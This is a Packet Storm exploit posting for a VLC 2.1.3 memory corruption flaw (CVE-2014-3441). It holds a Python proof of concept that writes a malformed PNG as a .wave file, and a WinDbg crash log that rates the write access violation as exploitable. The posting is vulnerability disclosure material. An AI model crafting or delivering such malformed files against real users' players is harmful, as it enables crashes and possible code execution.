what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

VLC Player 2.1.3 Memory Corruption

VLC Player 2.1.3 Memory Corruption
Posted May 9, 2014
Authored by Aryan Bayaninejad

VLC Player version 2.1.3 suffers from a memory corruption vulnerability.

tags | exploit
advisories | CVE-2014-3441
SHA-256 | 6792834d831a80e4ebb4ad64787a7b8546a2c954b030f0c8f1392124d68c13a5

VLC Player 2.1.3 Memory Corruption

Change Mirror Download
# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ]
# Date: [2014/05/07]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.videolan.org]
# Software Link: [
http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/
]
# Version: [Version 2.1.3 and prior to that]
# Tested on: [Windows Xp Sp 3 x86]
# CVE : [2014-3441]

details:

VLCplayer latest version V 2.1.3 suffers from an memory corruption
Vulnerability via a malformed .png file format when load
codec\libpng_plugin.dll, you can change file extention to .wave


Poc:

#!/usr/bin/python
data =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
outfile = file("poc.wave", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"





windbg result:


Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00426000 image00400000
ModLoad: 7c900000 7c9af000 ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 6a300000 6a324000 C:\Program Files\VideoLAN\VLC\libvlc.dll
ModLoad: 6a540000 6a791000 C:\Program Files\VideoLAN\VLC\libvlccore.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.DLL
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.DLL
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
(250.c1c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
ntdll.dll -
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48
edi=00351eb4
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:000> g
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 10000000 10008000 C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 64fc0000 65008000 C:\Program
Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
ModLoad: 6aac0000 6aacf000 C:\Program
Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
ModLoad: 6e980000 6e990000 C:\Program
Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
ModLoad: 6a100000 6a119000 C:\Program
Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
ModLoad: 6c400000 6c5f6000 C:\Program
Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
ModLoad: 68740000 68760000 C:\Program
Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
ModLoad: 6f440000 6f483000 C:\Program
Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
ModLoad: 6b840000 6b85b000 C:\Program
Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
ModLoad: 6f100000 6f114000 C:\Program
Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
ModLoad: 68bc0000 68bd7000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
ModLoad: 64a00000 64a8b000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
ModLoad: 70680000 70736000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
ModLoad: 6ae40000 6ae64000 C:\Program
Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
ModLoad: 69e40000 69e52000 C:\Program
Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
ModLoad: 6d700000 6d70c000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
ModLoad: 70240000 70267000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
ModLoad: 6cd00000 6ce7a000 C:\Program
Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
ModLoad: 66040000 66090000 C:\Program
Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
ModLoad: 625c0000 626f9000 C:\Program
Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\DSOUND.DLL
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 6ff40000 6ff55000 C:\Program
Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
ModLoad: 6e180000 6e191000 C:\Program
Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc
without interface.
ModLoad: 68e80000 6992e000 C:\Program
Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.DLL
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\userenv.dll
ModLoad: 01a20000 01ce5000 C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\comctl32.dll
ModLoad: 76360000 76370000 C:\WINDOWS\system32\winsta.dll
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 6d6c0000 6d6f7000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 6e040000 6e05e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 68440000 68458000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 6c380000 6c39b000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
ModLoad: 6ef40000 6ef4e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
es demux error: cannot peek
es demux error: cannot peek
ModLoad: 011e0000 011fa000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
ModLoad: 6c2c0000 6c2cd000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
ModLoad: 62380000 6238e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
ModLoad: 67e00000 67e0d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
ModLoad: 03610000 036fc000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
ModLoad: 6bf40000 6bf65000 C:\Program
Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
ModLoad: 6f8c0000 6f8eb000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
ModLoad: 6a840000 6a96f000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
ModLoad: 70b00000 70b0c000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
ModLoad: 6d8c0000 6d97b000 C:\Program
Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll
ModLoad: 64740000 6474d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
ModLoad: 6cbc0000 6cbcd000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
ModLoad: 65300000 6530c000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
ModLoad: 67500000 6750d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
ModLoad: 6ce80000 6ce8d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
ModLoad: 6fec0000 6fecc000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
ModLoad: 6b500000 6b56d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
ModLoad: 65280000 6528d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
ModLoad: 6c940000 6c94e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
ModLoad: 683c0000 6840f000 C:\Program
Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
(250.b14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\msvcrt.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80
edi=018e5000
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
msvcrt!memset+0x41:
77c47631 f3ab rep stos dword ptr es:[edi]
0:009> .load winext/msec.dll
0:009> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\libvlccore.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)

User mode write access violations that are not near NULL are exploitable.
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close